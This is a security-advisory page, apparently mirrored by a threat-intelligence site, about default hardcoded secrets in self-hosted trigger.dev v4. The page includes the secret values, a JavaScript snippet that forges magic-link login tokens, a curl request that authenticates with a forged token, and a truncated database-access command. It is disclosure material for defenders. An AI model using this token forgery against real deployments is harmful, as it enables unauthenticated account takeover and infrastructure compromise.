highVulnerability

GHSA-pqxw-g93w-hj9x

## Summary Self-hosted trigger.dev v4 instances deployed using the provided Docker Compose configuration with default secrets from `hosting/docker/.env.example` are vulnerable to a multi-stage unauthenticated attack chain leading to complete infrastructure compromise. ## Vulnerability Details The `hosting/docker/.env.example` file contains hardcoded cryptographic secrets: ``` SESSION_SECRET=2818143646516f6fffd707b36f334bbb MAGIC_LINK_SECRET=44da78b7bbb0dfe709cf38931d25dcdd ENCRYPTION_KEY=f686147ab967943ebbe9ed3b496e465a MANAGED_WORKER_SECRET=447c29678f9eaf289e9c4b70d3dd8a7f ``` The `MAGIC_LINK_SECRET` is used by `[email protected]` to create authentication tokens via CryptoJS AES encryption. An attacker who knows this secret can forge valid magic links that authenticate as any email address without email delivery. The `validateSessionMagicLink` option defaults to `false` in the library (never overridden by trigger.dev), so no session-side validation occurs. User accounts are auto-created when `WHITELISTED_EMAILS` is not set (the default for self-hosted). ## Steps to Reproduce ### Setup ```bash cd hosting/docker && cp .env.example .env cd webapp && docker compose up -d cd ../worker && docker compose up -d ``` ### Step 1: Forge magic link token ```javascript const CryptoJS = require('crypto-js'); const secret = '44da78b7bbb0dfe709cf38931d25dcdd'; const payload = JSON.stringify({e: '[email protected]', c: Date.now()}); const token = encodeURIComponent(CryptoJS.AES.encrypt(payload, secret).toString()); console.log('https://target:8030/magic?token=' + token); ``` ### Step 2: Authenticate via forged magic link ```bash curl -v "http://localhost:8030/magic?token=" # Returns: HTTP 302, set-cookie: __session=eyJ1c2VyIjp7InVzZXJJZCI6ImNtcGg3OTBxZjAwMDR0bjU1ZWM3bHlxN2EifX0=... # User auto-created, session cookie set, redirects to /orgs/new ``` ### Step 3: Verify database access from runner network ```bash docker run --rm --network webapp postgres:14 psql "po

Properties

ghsa_id
GHSA-pqxw-g93w-hj9x
summary
Trigger.dev Self-Hosted Deployment: Default Secrets allow Unauthenticated Infrastructure Compromise
severity
high
last_source
GitHub Advisory Database
cve_id
GHSA-pqxw-g93w-hj9x
signal_observed_at
2026-10-03T01:59:23+00:00
is_ghsa_only
true
retrieved_at
2026-10-03T18:15:00+00:00
ghsa_published
2026-10-02T22:39:48Z
source_url
https://github.com/advisories/GHSA-pqxw-g93w-hj9x
ghsa_updated
2026-10-02T22:42:08Z

Related Entities (5)

REPORTED_BY (1)

→[Source]GitHub Advisory Database

VULNERABLE_TO (1)

←[Software]npm/trigger.dev

AFFECTS (1)

→[Software]npm/trigger.dev

HAS_WEAKNESS (2)

→[Weakness]Improper Isolation or Compartmentalization
→[Weakness]Use of Default Password

Explore deeper with Ninja Signal's threat intelligence graph